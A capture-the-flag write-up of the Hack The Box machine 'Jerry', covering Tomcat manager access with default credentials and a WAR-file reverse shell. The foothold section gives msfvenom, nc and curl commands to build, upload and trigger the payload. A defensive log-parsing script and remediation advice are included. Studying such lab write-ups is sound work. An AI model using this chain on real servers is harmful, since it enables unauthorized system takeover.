Jerry
Apache Tomcat's Manager interface was exposed with default credentials (tomcat:s3cret), allowing upload of a malicious WAR file that executed a reverse shell directly as NT AUTHORITY\SYSTEM.
Overview
Jerry is an Easy Windows box running Apache Tomcat 7.0.88 on port 8080. The Tomcat Manager application was left accessible with the well-known default credential pair tomcat:s3cret, a CWE-1188 (Initialization with Hardcoded Credentials) misconfiguration. Uploading a malicious Java WAR file through the Manager’s text API deployed a JSP reverse shell, and because Tomcat was configured to run as NT AUTHORITY\SYSTEM, the resulting shell had full control of the machine from the first connection — no lateral movement or privilege escalation required.
Machine Matrix
The Real-Life axis dominates — default Tomcat credentials and WAR-based RCE are a genuine production risk seen in real-world breaches, while the absence of a named CVE and any custom exploitation reflects how entirely tool-driven this attack chain is.
Recon
| Port | Service | Notes |
|---|---|---|
| 8080 | HTTP / Apache Tomcat 7.0.88 | Manager UI exposed at /manager/html |
```bash
nmap -p- --min-rate=1000 -T4 -Pn 10.10.10.X
nmap -p8080 -sC -sV -Pn 10.10.10.X
```
Only port 8080 answers. The Tomcat default page loads immediately, and the Manager link at /manager/html prompts for Basic authentication — making credential testing the natural next step.
Enumeration
Spray common Tomcat default credential pairs against the Manager endpoint. The pair tomcat:s3cret returns HTTP 200, confirming access:
```bash
curl -s -o /dev/null -w "%{http_code}" -u "tomcat:s3cret" http://10.10.10.X:8080/manager/html
```
The Manager dashboard confirms Tomcat 7.0.88 on Windows and shows the deploy-WAR interface. The /manager/text/deploy API accepts a WAR upload over HTTP — no browser required.
Foothold
Generate a JSP reverse shell WAR payload with msfvenom:
```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<lhost> LPORT=4444 -f war -o /tmp/shell.war
```
Start a listener:
```bash
nc -lvnp 4444
```
Deploy the WAR via the Tomcat text manager API using the confirmed credentials:
```bash
curl -s -u "tomcat:s3cret" -T /tmp/shell.war \
  "http://10.10.10.X:8080/manager/text/deploy?path=/shell&update=true"
```
Trigger the deployed application to execute the JSP reverse shell:
```bash
curl -s "http://10.10.10.X:8080/shell/"
```
The listener catches the shell. whoami confirms nt authority\system — Tomcat was running as the Windows SYSTEM account, so full machine access is immediate.
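From the defender's side, every step of this chain leaves a trace in Tomcat's access log: a burst of 401s against /manager from one source while credentials are sprayed, then an authenticated 200 on /manager/text/deploy (or /manager/html/upload) as the WAR lands. The following is an added example, not code from the writeup, that parses lines in Tomcat's AccessLogValve "common" pattern and flags both events; the log lines and the spray threshold are constructed for illustration.

```python
import re
from collections import Counter

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
# Both Manager interfaces that accept a WAR upload
DEPLOY_PATHS = ("/manager/text/deploy", "/manager/html/upload")
SPRAY_THRESHOLD = 5  # failed Basic-auth attempts from one source (assumed value)

def parse(line):
    """Return the fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def analyze(lines):
    """Return findings: credential spraying against the Manager and
    successful WAR deployments through either Manager interface."""
    findings = []
    failed = Counter()
    for line in lines:
        r = parse(line)
        if not r:
            continue
        # 401 on any /manager path means a rejected Basic-auth attempt
        if r["path"].startswith("/manager") and r["status"] == "401":
            failed[r["ip"]] += 1
        # A 200 on a deploy endpoint means a WAR was accepted (%r keeps the query string)
        if r["status"] == "200" and r["path"].startswith(DEPLOY_PATHS):
            findings.append({"type": "war_deploy", "ip": r["ip"],
                             "user": r["user"], "path": r["path"]})
    for ip, n in failed.items():
        if n >= SPRAY_THRESHOLD:
            findings.append({"type": "manager_spray", "ip": ip, "failures": n})
    return findings

# Constructed sample log: six rejected logins, then a successful login,
# a WAR deploy to /shell, and the first request that triggers it.
SAMPLE = [f'10.10.14.5 - - [06/Jul/2024:10:15:0{i} +0000] "GET /manager/html HTTP/1.1" 401 2473'
          for i in range(1, 7)] + [
    '10.10.14.5 - tomcat [06/Jul/2024:10:15:09 +0000] "GET /manager/html HTTP/1.1" 200 19114',
    '10.10.14.5 - tomcat [06/Jul/2024:10:15:20 +0000] "PUT /manager/text/deploy?path=/shell&update=true HTTP/1.1" 200 45',
    '10.10.14.5 - - [06/Jul/2024:10:15:25 +0000] "GET /shell/ HTTP/1.1" 200 -',
    '10.10.14.9 - - [06/Jul/2024:10:16:00 +0000] "GET / HTTP/1.1" 200 11452',
]

if __name__ == "__main__":
    for f in analyze(SAMPLE):
        print(f)
```

The same two signals map to the fixes: removing or rotating the default tomcat-users.xml entry stops the spray from ever succeeding, and a service account without SYSTEM rights limits what a deployed WAR can do.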
User flag
```bash
type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt" # HTB{...}
```
The shell lands directly as NT AUTHORITY\SYSTEM, giving access to both flag files from the same session — Jerry stores user and root flags together in a single file on the Administrator’s Desktop.
Privilege Escalation
No privilege escalation was required. The Tomcat service was configured to run as NT AUTHORITY\SYSTEM, so the WAR shell connected back with the highest privilege level on the system. The foothold is already full compromise.
Root flag
```bash
type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt" # HTB{...}
```
Both flags are read from the same file. Full machine compromise achieved via default credentials and a WAR-based remote code execution technique — no escalation needed because the service account was never locked down.